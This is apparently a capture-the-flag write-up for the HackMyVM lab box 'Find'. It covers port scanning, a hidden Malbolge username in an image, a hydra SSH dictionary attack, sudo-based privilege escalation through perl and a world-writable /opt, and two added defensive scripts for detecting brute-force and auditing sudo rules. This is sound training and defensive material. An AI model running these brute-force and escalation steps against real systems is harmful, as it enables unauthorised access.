NOTES ABOUT Find
[ 2022-10-10 ] [ HackMyVM / Find ] Status: Rooted
Skills: Port Scanning, Fuzz, Dictionary Attack, bash
Tools: nmap, gobuster, ssh, hydra
PORT SCANNING
$ nmap -T4 -sCSV -p- 10.0.2.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6e:f7:90:04:84:0d:cd:1e:5d:2e:da:b1:51:d9:bf:57 (RSA)
| 256 39:5a:66:38:f7:64:9a:94:dd:bc:b6:fb:f8:e7:3f:87 (ECDSA)
|_ 256 8c:26:e7:26:62:77:16:40:fb:b5:cf:a6:1c:e0:f6:9d (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
GETTING IN
$ gobuster -q dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,htm,php,txt,xml -u http://10.0.2.24
/index.html (Status: 200) [Size: 10701]
/manual (Status: 301) [Size: 307] [--> http://10.0.2.24/manual/]
/robots.txt (Status: 200) [Size: 13] => "find user :)"
/server-status (Status: 403) [Size: 274]
$ gobuster -q dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x jpg,jpeg,png,gif -u http://10.0.2.24
/cat.jpg (Status: 200) [Size: 35137]
/manual (Status: 301) [Size: 307] [--> http://10.0.2.24/manual/]
/server-status (Status: 403) [Size: 274]
$ wget http://10.0.2.24/cat.jpg
$ strings cat.jpg
JFIF
@File source: https://commons.wikimedia.org/wiki/File:Cat03.jpg
, #&')*)
[...]
>C<;_"!~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJ`_dcba`_^]\Uy<XW
VOsrRKPONGk.-,+*)('&%$#"!~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONML
KJIHGFEDZY^W\[ZYXWPOsSRQPON0Fj-IHAeR
LAST STRING OF FILE IS A "Malbolge" PROGRAM: RUN IT THROUGH A MALBOLGE INTERPRETER TO GET THE USERNAME
USER: *****
$ hydra -l ****** -P /usr/share/wordlists/rockyou.txt 10.0.2.24 ssh
[...]
[DATA] attacking ssh://10.0.2.24:22/
[22][ssh] host: 10.0.2.24 login: ***** password: iloveyou
[...]
$ ssh ******@10.0.2.24
*****@10.0.2.24's password:
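The hydra run above leaves a very recognisable trace in the target's auth log: a burst of "Failed password" lines from one source followed by an "Accepted password" for the same user. The script below is an added example (not part of the write-up) that counts failed SSH logins per source address from sshd log lines and flags sources that exceed a threshold, marking those where a login was accepted after the threshold had already been crossed. The log lines, the hostname reuse, the user name "someuser" and the addresses 10.0.2.15 / 10.0.2.7 / 10.0.2.9 are constructed for the demo, not taken from the box.

```shell
#!/bin/sh
# Added example: detect SSH password brute-force bursts in sshd log lines.
# Constructed sample log (not real output from the Find box).
SAMPLE_AUTH_LOG='Oct 10 12:00:01 find sshd[1201]: Failed password for invalid user admin from 10.0.2.15 port 50222 ssh2
Oct 10 12:00:02 find sshd[1203]: Failed password for someuser from 10.0.2.15 port 50224 ssh2
Oct 10 12:00:02 find sshd[1205]: Failed password for someuser from 10.0.2.15 port 50226 ssh2
Oct 10 12:00:03 find sshd[1207]: Failed password for someuser from 10.0.2.15 port 50228 ssh2
Oct 10 12:00:03 find sshd[1209]: Failed password for someuser from 10.0.2.15 port 50230 ssh2
Oct 10 12:00:04 find sshd[1211]: Failed password for someuser from 10.0.2.15 port 50232 ssh2
Oct 10 12:00:04 find sshd[1213]: Accepted password for someuser from 10.0.2.15 port 50234 ssh2
Oct 10 12:05:00 find sshd[1300]: Failed password for root from 10.0.2.7 port 41000 ssh2
Oct 10 12:06:00 find sshd[1302]: Accepted publickey for ops from 10.0.2.9 port 41100 ssh2: ED25519 SHA256:constructed'

# ssh_bruteforce_sources LOGTEXT THRESHOLD
# Prints one line per source address with >= THRESHOLD failed logins:
#   "<ip> <failures> ACCEPTED_AFTER_FAILURES"  if a login from that ip was
#                                              accepted once the threshold
#                                              had already been reached
#   "<ip> <failures> -"                        otherwise
# Lines are sorted so the output is stable for comparison.
ssh_bruteforce_sources() {
    printf '%s\n' "$1" | awk -v thr="$2" '
        # every "Failed password ... from <ip>" line counts against <ip>
        /sshd\[[0-9]+\]: Failed password for/ {
            for (i = 1; i <= NF; i++) if ($i == "from") { fail[$(i+1)]++; break }
        }
        # an accepted login only matters if the burst already happened
        /sshd\[[0-9]+\]: Accepted (password|publickey) for/ {
            for (i = 1; i <= NF; i++) if ($i == "from") {
                if (fail[$(i+1)] >= thr) ok[$(i+1)] = 1
                break
            }
        }
        END {
            for (ip in fail)
                if (fail[ip] >= thr)
                    printf "%s %d %s\n", ip, fail[ip],
                           (ip in ok) ? "ACCEPTED_AFTER_FAILURES" : "-"
        }' | sort
}

# Demo run: with a threshold of 5 only 10.0.2.15 is reported.
ssh_bruteforce_sources "$SAMPLE_AUTH_LOG" 5
```

On a real host the log text would come from `/var/log/auth.log` or `journalctl -u ssh`; the awk logic is the same. The "ACCEPTED_AFTER_FAILURES" marker is the line worth alerting on, since it is exactly the pattern a successful dictionary attack leaves behind.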
ELEVATING PRIVILEGES
******@find:~$ sudo -l
[sudo] password for ******:
Matching Defaults entries for ****** on find:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User ****** may run the following commands on find:
(kings) /usr/bin/perl
******@find:~$ sudo -u kings /usr/bin/perl -e 'exec "/bin/bash";'
kings@find:/home/******$ cd ~
kings@find:~$ cat user.txt
******************
kings@find:~$ echo "/bin/bash" > /opt/boom/boom.sh
kings@find:~$ echo '!#/bin/bash' > /opt/boom/boom.sh
kings@find:~$ echo 'bash' >> /opt/boom/boom.sh
kings@find:~$ sudo -l
Matching Defaults entries for kings on find:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User kings may run the following commands on find:
(ALL) NOPASSWD: /opt/boom/boom.sh
kings@find:~$ sudo /opt/boom/boom.sh
sudo: /opt/boom/boom.sh: command not found
kings@find:~$ ls -la /opt/
total 12
drwxrwxrwx 3 root root 4096 Oct 9 23:35 .
drwxr-xr-x 18 root root 4096 May 11 10:19 ..
kings@find:~$ mkdir /opt/boom
kings@find:~$ echo "/bin/bash" > /opt/boom/boom.sh
kings@find:~$ echo '!#/bin/bash' > /opt/boom/boom.sh
kings@find:~$ chmod +x /opt/boom/boom.sh
kings@find:~$ sudo /opt/boom/boom.sh
root@find:/home/kings# cat /root/root.txt
******************
root@find:~# init 0
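Both privilege escalations on this box come down to sudo rules that should never have been written: the first grants an interpreter (`/usr/bin/perl`), which can exec anything, and the second grants NOPASSWD on `/opt/boom/boom.sh`, a file that does not exist inside a world-writable `/opt` (the `drwxrwxrwx` in the `ls -la` output), so whoever can write there simply creates the script. The audit script below is an added example (not part of the write-up) that reads a file in sudoers syntax and reports exactly those conditions: interpreter commands, missing command paths, group/world-writable command files and world-writable directories on the command's path. The sample sudoers file, the user names "someuser" and "ops" and the temporary directory tree it builds are constructed for the demo; the `kings` rule and `/usr/bin/perl` are the ones from the box.

```shell
#!/bin/sh
# Added example: audit sudo rules for interpreter commands, missing command
# paths and writable locations. Usage: audit_sudo_rules FILE, where FILE uses
# sudoers syntax ("user HOST=(runas) [NOPASSWD:] /path/cmd, /path/cmd2").

# Succeeds if the path is world-writable. -L follows symlinks so that on a
# merged-/usr layout /bin is judged by the target directory, not the link.
world_writable() {
    [ "$(ls -ldL "$1" 2>/dev/null | cut -c9)" = "w" ]
}

# Succeeds if group or other can write the file.
group_or_world_writable() {
    perm=$(ls -ldL "$1" 2>/dev/null | cut -c1-10)
    [ "$(printf '%s' "$perm" | cut -c6)" = "w" ] || [ "$(printf '%s' "$perm" | cut -c9)" = "w" ]
}

# Shells and scripting interpreters: sudo on any of these is sudo on everything.
is_interpreter() {
    case "$(basename "$1")" in
        sh|bash|dash|zsh|ksh|perl|python|python2|python3|ruby|php|node|lua|awk|gawk) return 0 ;;
    esac
    return 1
}

# Output lines: "<FINDING> <user> <command-path> [detail]"
audit_sudo_rules() {
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in ''|'#'*|Defaults*) continue ;; esac
        user=${line%%[[:space:]]*}
        # keep what follows '=', drop the (runas) group and the tag words
        spec=$(printf '%s' "$line" | sed -E 's/^[^=]*=//; s/\([^)]*\)//; s/(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV):[[:space:]]*//g')
        printf '%s\n' "$spec" | tr ',' '\n' | while IFS= read -r cmd; do
            cmd=$(printf '%s' "$cmd" | sed 's/^[[:space:]]*//')
            path=${cmd%%[[:space:]]*}          # drop any arguments
            [ -z "$path" ] && continue
            if [ "$path" = "ALL" ]; then
                printf 'ALL %s %s any command permitted\n' "$user" "$path"
                continue
            fi
            if is_interpreter "$path"; then
                printf 'INTERPRETER %s %s\n' "$user" "$path"
            fi
            if [ ! -e "$path" ]; then
                printf 'MISSING %s %s\n' "$user" "$path"
            elif group_or_world_writable "$path"; then
                printf 'WRITABLE_FILE %s %s\n' "$user" "$path"
            fi
            # nearest existing world-writable ancestor: an attacker can create
            # the rest of the path below it (this is the /opt case on the box)
            d=$(dirname "$path")
            while [ "$d" != "/" ]; do
                if [ -d "$d" ] && world_writable "$d"; then
                    printf 'WRITABLE_DIR %s %s %s\n' "$user" "$path" "$d"
                    break
                fi
                d=$(dirname "$d")
            done
        done
    done < "$1"
}

# Builds a constructed demo tree mirroring the box: a world-writable "opt"
# with no boom/ inside it. Prints the temp directory; the sudoers sample
# lives at <dir>/sudoers.sample.
demo_setup() {
    tmp=$(mktemp -d)
    mkdir "$tmp/opt"
    chmod 777 "$tmp/opt"                 # the drwxrwxrwx /opt from the box
    cat > "$tmp/sudoers.sample" <<EOF
# constructed sample, not the box's real /etc/sudoers
Defaults env_reset
someuser ALL=(kings) /usr/bin/perl
kings ALL=(ALL) NOPASSWD: $tmp/opt/boom/boom.sh
ops ALL=(root) NOPASSWD: /bin/ls -la /var/log
EOF
    printf '%s\n' "$tmp"
}

# Demo run
d=$(demo_setup)
audit_sudo_rules "$d/sudoers.sample"
rm -rf "$d"
```

Run it against `/etc/sudoers` and the files under `/etc/sudoers.d/` as root. Paths under `/tmp` are reported as WRITABLE_DIR as well, which is intended: a sudo target living under a world-writable, sticky directory is still a finding. The fix for both rules on this box is the same: point sudo only at root-owned, non-writable executables in root-owned directories, and never at an interpreter.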